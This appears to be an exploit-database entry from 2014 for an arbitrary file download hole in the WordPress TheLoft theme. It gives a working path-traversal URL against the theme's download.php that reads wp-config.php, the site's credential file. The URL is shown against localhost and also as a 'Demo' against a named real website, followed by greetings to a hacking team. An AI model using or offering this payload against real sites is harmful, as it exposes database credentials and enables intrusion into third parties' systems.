WordPress TheLoft Theme Arbitrary File Download Vulnerability

2014-09-12T00:00:00
ID 1337DAY-ID-22631
Type zdt
Reporter rir1a
Modified 2014-09-12T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Poc:
http://localhost/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php


Demo:
http://909lifefm.com/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php



#---------------------------------------
Greetz to : All Egy-Shell Team Members - Xms
#---------------------------------------

#  0day.today [2018-03-13]  #